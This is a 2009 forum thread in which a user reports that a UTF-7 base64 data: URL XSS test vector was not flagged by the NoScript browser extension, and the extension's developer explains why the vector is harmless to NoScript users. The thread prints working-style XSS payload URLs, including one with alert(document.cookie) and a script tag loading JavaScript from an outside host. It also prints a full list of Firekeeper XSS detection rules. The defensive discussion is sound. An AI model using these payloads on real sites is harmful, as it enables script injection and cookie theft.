Hi Giorgio Maone,
The following attack vector: data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
was not being detected by NoScript when tested here: hxxp://bypass.xssing.com/testing.php?vector=data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
luntrus
XSS exploit not detected by NoScript
XSS exploit not detected by NoScript
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2a1pre) Gecko/20090322 Minefield/3.6a1pre
-
- Ambassador
- Posts: 1586
- Joined: Fri Mar 20, 2009 4:47 am
- Location: Colorado, USA
Re: XSS exploit not detected by NoScript
Thank you for posting this over here, luntrus. Was this one of the exploits tagged by Firekeeper?
http://forum.avast.com/index.php?topic= ... #msg364676
http://forum.avast.com/index.php?topic= ... #msg364676
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7
- Giorgio Maone
- Site Admin
- Posts: 9454
- Joined: Wed Mar 18, 2009 11:22 pm
- Location: Palermo - Italy
- Contact:
Re: XSS exploit not detected by NoScript
As I already explained elsewhere, this "exploit" is unrelevant to NoScript.
How is it exactly supposed to trigger, while NoScript is enabled?
data: URLs are blocked by NoScript on untrusted sites, and they inherit the same principal as the hosting page, so they're not cross-site.
So, can you show me plausible scenario in which this "exploit" can be successful with NoScript?
On a side note, where did you take it to test? It's the second time I see it wrongly reported as "XSS bypassing NoScript"...
How is it exactly supposed to trigger, while NoScript is enabled?
data: URLs are blocked by NoScript on untrusted sites, and they inherit the same principal as the hosting page, so they're not cross-site.
So, can you show me plausible scenario in which this "exploit" can be successful with NoScript?
On a side note, where did you take it to test? It's the second time I see it wrongly reported as "XSS bypassing NoScript"...
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 (.NET CLR 3.5.30729)
Re: XSS exploit not detected by NoScript
Hi Giorgio Maone,
I believe you when you say that when script is disabled to run, then no exploit can be executed.
That is simple logic, and everybody can understand that.
The tests are to be found here: http://www.xssing.com/index.php?x=1 (and subsequent pages)
Normally I get a Firekeeper alert like for instance this one:
or Netcraft warns me here:
luntrus
I believe you when you say that when script is disabled to run, then no exploit can be executed.
That is simple logic, and everybody can understand that.
The tests are to be found here: http://www.xssing.com/index.php?x=1 (and subsequent pages)
Normally I get a Firekeeper alert like for instance this one:
Code: Select all
=== Triggered rule ===
alert(url_content:"%3CBR"; nocase; msg:"<br> tags GET request cross site scripting attempt"; url_re:"/%3Cbr.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
=== Request URL ===
http://bypass.xssing.com/testing.php?vector=%22%3E/XaDoS/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cscript%3Cbr%20/%3Esrc=%22http://www.site.com/XSS.js%22%3E%3C/script%3E
But I do not get a warning from NoScript, is this because I have RequestPolicy also active on the test page?The page you are trying to visit is using Cross-Site Scripting (XSS).
This is a technique commonly used in phishing attacks.
URL: http://bypass.xssing.com/testing.php%3fvector=%25...ion(alert())%253E
If this is a mistake, please report it using
'Report Incorrectly Blocked URL' in the Netcraft Menu.
Do you still want to go there?
luntrus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2a1pre) Gecko/20090323 Minefield/3.6a1pre
- Giorgio Maone
- Site Admin
- Posts: 9454
- Joined: Wed Mar 18, 2009 11:22 pm
- Location: Palermo - Italy
- Contact:
Re: XSS exploit not detected by NoScript
If you don't get the warning for any of the PoC there, it means that you don't have bypass.xssing.com in your whitelist: if there's no scripting, there's no cross-site scripting either.luntrus wrote:But I do not get a warning from NoScript, is this because I have RequestPolicy also active on the test page?
If even after whitelisting bypass.xssing.com some PoCs don't trigger the warning, it just mean that the PoC as it is cannot work in Firefox, either because it's not compatible with Mozilla browser (e.g. attacks based on proprietary Microsoft extensions, such as CSS expressions), or is not correctly implemented (the 1st data: "PoC" is just flawed, it couldn't run on any browser as it is) or some secondary NoScript protection blocks its execution independently from XSS.
In other words, even though they are presented as "XSS exploits", those which don't trigger NoScript's warnings can be considered false positives if they do in FireKeeper. This is understandable, since FireKeeper uses generic hardcoded rules, a blacklist which is not specifically tailored on Firefox and in facts contain Microsoft-specific signatures for exploits which work on IE but mean nothing to Firefox.
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 (.NET CLR 3.5.30729)
Re: XSS exploit not detected by NoScript
Hi Giorgio Maone,
That is all understandable and is quite reassuring, so the protection of NoScript is completely full proof in these respects, and having Firekeeper there is just educational so that it will keep the browser user alert to what rules are eventually triggered.
I think it is never a bad thing for the security savvy user to be aware what is going on on the browser. I keep an eye on the error console and if something crops up I will report here off course.
The firekeeper rules against XXS exploits is as follows:
Why there is not a specific one just for Firefox?
Furthermore, many, many thanks for your detailed explanation of the facts,
luntrus
That is all understandable and is quite reassuring, so the protection of NoScript is completely full proof in these respects, and having Firekeeper there is just educational so that it will keep the browser user alert to what rules are eventually triggered.
I think it is never a bad thing for the security savvy user to be aware what is going on on the browser. I keep an eye on the error console and if something crops up I will report here off course.
The firekeeper rules against XXS exploits is as follows:
Code: Select all
#Rules to detect cross site scripting attacks
####Created by Thomas Kilgore
# javascript: uri schemes in GET requests
alert(url_content:"javascript:"; nocase; msg:"javascript: GET request cross site scripting attempt"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"mocha:"; nocase; msg:"mocha: GET request cross site scripting attempt"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"livescript:"; nocase; msg:"livescript: GET request cross site scripting attempt"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
# normalish html tags using %3C and %3E in GET requests
alert(url_content:"%3CSCRIPT"; nocase; msg:"<script> tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3CIMG"; nocase; msg:"<img> tags GET request cross site scripting attempt"; url_re:"/%3Cimg.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ciframe"; nocase; msg:"<iframe> tags GET request cross site scripting attempt"; url_re:"/%3Ciframe.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ciframe"; nocase; msg:"malformed <iframe< tags GET request cross site scripting attempt"; url_re:"/%3Ciframe.*%3C/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cbody"; nocase; msg:"<body> tags GET request cross site scripting attempt"; url_re:"/%3Cbody.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3CINPUT"; nocase; msg:"<input> tags GET request cross site scripting attempt"; url_re:"/%3CINPUT.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3CBGSOUND"; nocase; msg:"<bgsound> tags GET request cross site scripting attempt"; url_re:"/%3CBGSOUND.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3CBR"; nocase; msg:"<br> tags GET request cross site scripting attempt"; url_re:"/%3Cbr.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Clayer"; nocase; msg:"<layer> tags GET request cross site scripting attempt"; url_re:"/%3Clayer.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Clink"; nocase; msg:"<link> tags GET request cross site scripting attempt"; url_re:"/%3Clink.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cstyle"; nocase; msg:"<style> tags GET request cross site scripting attempt"; url_re:"/%3Cstyle.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cmeta"; nocase; msg:"<meta> tags GET request cross site scripting attempt"; url_re:"/%3Cmeta.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cframe"; nocase; msg:"<frame> tags GET request cross site scripting attempt"; url_re:"/%3Cframe.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ctable"; nocase; msg:"<table> tags GET request cross site scripting attempt"; url_re:"/%3Ctable.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cdiv"; nocase; msg:"<div> tags GET request cross site scripting attempt"; url_re:"/%3Cdiv.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ctd"; nocase; msg:"<td> tags GET request cross site scripting attempt"; url_re:"/%3Ctd.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ca"; nocase; msg:"<a> tags GET request cross site scripting attempt"; url_re:"/%3Ca.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cbase"; nocase; msg:"<base> tags GET request cross site scripting attempt"; url_re:"/%3Cbase.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cobject"; nocase; msg:"<object> tags GET request cross site scripting attempt"; url_re:"/%3Cobject.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Capplet"; nocase; msg:"<applet> tags GET request cross site scripting attempt"; url_re:"/%3Capplet.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cembed"; nocase; msg:"<embed> tags GET request cross site scripting attempt"; url_re:"/%3Cembed.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cxml"; nocase; msg:"<xml> tags GET request cross site scripting attempt"; url_re:"/%3Cxml.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cspan"; nocase; msg:"<span> tags GET request cross site scripting attempt"; url_re:"/%3Cspan.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Chtml"; nocase; msg:"<html> tags GET request cross site scripting attempt"; url_re:"/%3Chtml*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ct:set"; nocase; msg:"<t:set> tags GET request cross site scripting attempt"; url_re:"/%3Ct:set*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
# suspicious HTML-looking input.
alert(url_content:"%3C"; url_content:"%22"; url_content:"%3E"; msg:"Suspicious looking GET request containing %3C, %3E, and %22. Suspiciously HTML-like."; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3C"; url_content:"%2F"; url_content:"%3E"; msg:"Suspicious looking GET request containing %3C, %3E, and %2F. Suspiciously HTML-like."; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3C"; url_content:"'"; url_content:"%3E"; msg:"Suspicious looking GET request containing %3C, %3E, and '. Suspiciously HTML-like."; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
# IE hax.
alert (msg:"smuggling Javascript inside an image"; headers_content:"image"; nocase; headers_re:"/^Content-Type.*image/mi"; body_re:"/<script/i";)
####
Furthermore, many, many thanks for your detailed explanation of the facts,
luntrus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2a1pre) Gecko/20090323 Minefield/3.6a1pre
- Giorgio Maone
- Site Admin
- Posts: 9454
- Joined: Wed Mar 18, 2009 11:22 pm
- Location: Palermo - Italy
- Contact:
Re: XSS exploit not detected by NoScript
Because NoScript exists for Firefoxluntrus wrote: Why there is not a specific one just for Firefox?
BTW, just at glance from the rules you pasted, BGSOUND is not supported by Firefox, and the last rule clearly reveals some of these rules are IE-specific:
Code: Select all
# IE hax.
alert (msg:"smuggling Javascript inside an image"; headers_content:"image"; nocase; headers_re:"/^Content-Type.*image/mi"; body_re:"/<script/i";)
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 (.NET CLR 3.5.30729)